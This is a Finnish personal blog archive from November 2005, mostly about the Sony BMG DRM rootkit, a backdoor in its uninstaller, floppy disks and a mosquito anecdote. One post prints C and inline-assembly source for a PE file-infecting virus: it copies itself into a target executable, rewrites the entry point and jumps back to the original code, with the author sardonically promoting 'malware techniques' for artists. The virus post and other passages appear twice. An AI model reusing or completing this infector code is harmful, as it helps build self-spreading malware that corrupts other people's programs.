Uusimmat blogimerkinnät
- win7 käynnistyy itsekseen kello 3 aamulla 11.03.
- Poliisi estänyt kouluiskun? 06.11.
- Parodia ja tuloste-DRM :) 12.10.
- w3.org-sensuuri copypastevirhe? 29.09.
- Poliisi sensuroi www.w3.org:n 28.09.
- "Humanity is overrated" 25.09.
- Vaadin IRC-gallerian sensuurilistalle 12.05.
- Poliitikkojen henkilötietojen julkisuus 10.04.
- Nettiyhteisö huolissaan Pelastakaa Lapset... 22.03.
- Verkkopankin salasanoilla muihin palveluihin ... 06.03.
Blogi
ah, floppy-asemaSunnuntai 20.11.2005 06:51
Tiedostojen koot hahmottaa vasta, kun joutuu siirtämään ne floppyillä koneeseen jossa ei ole verkkoa. Sitä ei tajuakaan miten monta megaa mikäkin vie, ennenkuin on pitänyt yllä mainitulla tavalla veivata tiedostot laitteesta toiseen.
Rant and WhinePerjantai 18.11.2005 18:01
Sonyn tapaus rasittaa, ja rassaa niin paljon että kirjoitin siitä oman mielipidesivun.
http://hack.fi/~muzzy/sony-drm/rant-and-whine.html
Tiivistettynä: Sony BMG kaappaa ihmisten koneita ja rikkoo lakia, yrittää välttää vastuuta kaappaamalla pienemmän firman ja tekemällä pahat hommat siellä, sitten väittää olevansa syytön ja ettei heillä ollut mitään tekemistä homman kanssa.
http://hack.fi/~muzzy/sony-drm/rant-and-whine.html
Tiivistettynä: Sony BMG kaappaa ihmisten koneita ja rikkoo lakia, yrittää välttää vastuuta kaappaamalla pienemmän firman ja tekemällä pahat hommat siellä, sitten väittää olevansa syytön ja ettei heillä ollut mitään tekemistä homman kanssa.
Jee!Tiistai 15.11.2005 21:10
Minusta ja stopprotista on artikkeli täällä: http://p2pnet.net/story/6988
Sony & LGPLTiistai 15.11.2005 08:02
Sonyn DRM-kilkkeestä löytyi kuin löytyikin sitten sitä LGPL-koodia, eli ovat törkeästi ottaneet opensource-roinaa eikä mitään lisenssiä ole mukana eikä mainintaa dokuissa. Hyvä meno!
WheeMaanantai 14.11.2005 19:23
Sysinternalsin Mark linkkasi juttuuni sony-uninstall-rebootista blogissaan, siellä on mun nimikin: http://www.sysinternals.com/blog/2005/11/sony-no-more-rootkit-for-now.html
boingboingSunnuntai 13.11.2005 21:08
Whee. Juttuni sony-uninstaller-kämmistä pääsi boingboingiin :)
Sonyn uninstalleri on takaovi!Sunnuntai 13.11.2005 07:28
Jaahas jaahas! Jos olet uninstalloinut sonyn rootkitin, koneellasi on takaovi jota voi ihan www-sivujen kautta hyväksikäyttää, esim vaikka koneesi boottaamiseen mitään sinulta kysymättä!
Lisää faktaa, ja demonstraatio:
http://hack.fi/~muzzy/sony-drm/
Lisää faktaa, ja demonstraatio:
http://hack.fi/~muzzy/sony-drm/
Päivän viruspläjäysSunnuntai 13.11.2005 05:11
Jäi nyt vähän myöhäiselle tälle viikolle, mutta parempi myöhään kuin ei milloinkaan.
Tälläkertaa esittelyssä on toinen saastuttajafunktioista. Aiemminhan tuli nähtyä funktio joka allokoi uuden sectionin (ja joka muuten sisältää kriittisen heikkouden ettei sitä voi käyttää oikeassa viruksessa, parempi etten korjaa). Tälläkertaa näytän funktion joka kopioi itse viruksen kohteeseen, eli tekee itse saastutus-osuuden:
#define ENTRYWRITE_MAGIC 0x434
#define VIRUSENTRY_MAGIC 0x2C0
inline void bar(char *base, unsigned int fsize)
{
unsigned int attacksize = 0x1000;
unsigned int virus;
__asm {
call blehbleh
blehbleh:
pop eax
mov virus, eax
}
virus = (virus/0x1000)*0x1000;
mmove(base+fsize, (char*)virus, attacksize);
pe::dos_header *dosh = reinterpret_cast<pe::dos_header*>(base);
pe::nt_header32 *peh = reinterpret_cast<pe::nt_header32*>(base+dosh->e_lfanew);
*(unsigned int*)(base+fsize+ENTRYWRITE_MAGIC) = peh->optional_header.image_base + peh->optional_header.address_of_entrypoint;
pe::section_header* sections = reinterpret_cast<pe::section_header*>
(base+dosh->e_lfanew+peh->file_header.size_of_optional_header + 20+4); // fileheader+signature = 20+4
pe::section_header *v = sections + peh->file_header.number_of_sections-1;
peh->optional_header.address_of_entrypoint = v->virtual_address+VIRUSENTRY_MAGIC;
}
Alussa oleva pätkä assembleria siis käyttää call/pop menetelmää EIP-rekisterin lukemiseksi, tämän jälkeen otetaan 0x1000:lla jaollinen osuus eli sama granulariteetti kuin aiemmassa section-allokaattorissa. Tällä pitäisi löytyä pohjaosoite virukseen, koska EIP osoittaa aina jonnekin tämän blokin sisälle. mmove() on simppeli memmove-klooni. Piti toteuttaa itse, kun memmove olisi generoinut MoveMemory apikutsun, ja oikeita funktiokutsuja ei tässä viruksessa voinut käyttää... Tässä nyt täydellisyyden vuoksi vielä se mmovekin:
inline void mmove(char*dest, char*src, unsigned int size)
{
if (dest>src)
for(;size;--size)
dest[size-1] = src[size-1];
else
for(unsigned int i=0;i<size;++i)
dest = src;
}
Ylemmässä bar()-funktiossa ei ole juurikaan sen erikoisempaa, definatut magic-arvot määrittävät missä kohtaa virusta on oikea entrypointti ja missä kohtaa on viruksen pääfunktion loppu, josta löytyy assypätkä:
__asm {
push 0x12345678
ret
}
Tätä käytetään alkuperäiseen entrypointtiin hyppäämiseen, jotta saastunut ohjelma saa ajovuon haltuunsa kun virus on tehnyt oman työnsä. Ensikerralla sitten ehkä saastuttajamekanismin pääfunktio.
Ja mainittakoon vielä että tätä tietotaitoa levitän, koska tekijänoikeus on antamassa kaikille taiteilijoille oikeuden suojata tekeleitään keinoja kaitamatta. Tarkoitus hyvittää keinot, joten olisi epäreilua jos pienet artistit eivät osaisi tehokkaita haittatekniikoita.
Tälläkertaa esittelyssä on toinen saastuttajafunktioista. Aiemminhan tuli nähtyä funktio joka allokoi uuden sectionin (ja joka muuten sisältää kriittisen heikkouden ettei sitä voi käyttää oikeassa viruksessa, parempi etten korjaa). Tälläkertaa näytän funktion joka kopioi itse viruksen kohteeseen, eli tekee itse saastutus-osuuden:
#define ENTRYWRITE_MAGIC 0x434
#define VIRUSENTRY_MAGIC 0x2C0
inline void bar(char *base, unsigned int fsize)
{
unsigned int attacksize = 0x1000;
unsigned int virus;
__asm {
call blehbleh
blehbleh:
pop eax
mov virus, eax
}
virus = (virus/0x1000)*0x1000;
mmove(base+fsize, (char*)virus, attacksize);
pe::dos_header *dosh = reinterpret_cast<pe::dos_header*>(base);
pe::nt_header32 *peh = reinterpret_cast<pe::nt_header32*>(base+dosh->e_lfanew);
*(unsigned int*)(base+fsize+ENTRYWRITE_MAGIC) = peh->optional_header.image_base + peh->optional_header.address_of_entrypoint;
pe::section_header* sections = reinterpret_cast<pe::section_header*>
(base+dosh->e_lfanew+peh->file_header.size_of_optional_header + 20+4); // fileheader+signature = 20+4
pe::section_header *v = sections + peh->file_header.number_of_sections-1;
peh->optional_header.address_of_entrypoint = v->virtual_address+VIRUSENTRY_MAGIC;
}
Alussa oleva pätkä assembleria siis käyttää call/pop menetelmää EIP-rekisterin lukemiseksi, tämän jälkeen otetaan 0x1000:lla jaollinen osuus eli sama granulariteetti kuin aiemmassa section-allokaattorissa. Tällä pitäisi löytyä pohjaosoite virukseen, koska EIP osoittaa aina jonnekin tämän blokin sisälle. mmove() on simppeli memmove-klooni. Piti toteuttaa itse, kun memmove olisi generoinut MoveMemory apikutsun, ja oikeita funktiokutsuja ei tässä viruksessa voinut käyttää... Tässä nyt täydellisyyden vuoksi vielä se mmovekin:
inline void mmove(char*dest, char*src, unsigned int size)
{
if (dest>src)
for(;size;--size)
dest[size-1] = src[size-1];
else
for(unsigned int i=0;i<size;++i)
dest = src;
}
Ylemmässä bar()-funktiossa ei ole juurikaan sen erikoisempaa, definatut magic-arvot määrittävät missä kohtaa virusta on oikea entrypointti ja missä kohtaa on viruksen pääfunktion loppu, josta löytyy assypätkä:
__asm {
push 0x12345678
ret
}
Tätä käytetään alkuperäiseen entrypointtiin hyppäämiseen, jotta saastunut ohjelma saa ajovuon haltuunsa kun virus on tehnyt oman työnsä. Ensikerralla sitten ehkä saastuttajamekanismin pääfunktio.
Ja mainittakoon vielä että tätä tietotaitoa levitän, koska tekijänoikeus on antamassa kaikille taiteilijoille oikeuden suojata tekeleitään keinoja kaitamatta. Tarkoitus hyvittää keinot, joten olisi epäreilua jos pienet artistit eivät osaisi tehokkaita haittatekniikoita.
blogaamistoleranssiPerjantai 11.11.2005 13:51
Heräsin ja pohdin, mikä mahtaa olla raja asioille joista blogaa. Koska olen tätä kirjoittamassa, on raja ilmeisen matala. Hykertelen kun ajattelen, että kaikille kavereilleni tulee etusivulle ilmoitus blogistani. Oppivat varmaan hyvin pian dismissaamaan ne lukematta mitä sanottavaa minulla on (tai ei ole) :)
Miekkamiehen tie on vaikea ja vaivalloinenPerjantai 11.11.2005 04:28
Yritän metsästää hyttystä miekalla. Siihen on hyvin vaikea osua. Pieni koristeellinen kodachia jäljittelevä lelumiekkani ei leikkaa juuri mitään paitsi ehkä ilmaa, jos sitäkään. Joskus aiemmin taistelin tällä pöytätuuletintani vastaan, ja tuolloin tajusin että kaikkia taisteluja ei mitenkään vain voi voittaa. Tuuletin vain puhalsi ja puhalsi, mutten voinut leikata tuulta. Leikkasin ilmaa miten tahansa, se yhä vain puhalsi. Niin se vain on, että jotkin aseet ovat tehottomia joitain asioita vastaan.
Ja se hyttynen senkun väistelee miekkani sivallukset. Tilastollisesti katsoen siihen pitäisi ennenpitkää osua, viimeistään äärettömän määrän sivalluksia jälkeen. Ja sitten kun käyn purkamaan tätä kärsimystäni koneelle, tuo ninjahyttynen piiloutuu ja pyörii nyt jossain tietoisuuteni tavoittamattomissa. Oikea samurai ei olisi jättänyt taisteluaan kesken whinetäkseen päiväkirjalleen. Aina voi hävitä.
muzzy - hyttynen, 0-1
Ja se hyttynen senkun väistelee miekkani sivallukset. Tilastollisesti katsoen siihen pitäisi ennenpitkää osua, viimeistään äärettömän määrän sivalluksia jälkeen. Ja sitten kun käyn purkamaan tätä kärsimystäni koneelle, tuo ninjahyttynen piiloutuu ja pyörii nyt jossain tietoisuuteni tavoittamattomissa. Oikea samurai ei olisi jättänyt taisteluaan kesken whinetäkseen päiväkirjalleen. Aina voi hävitä.
muzzy - hyttynen, 0-1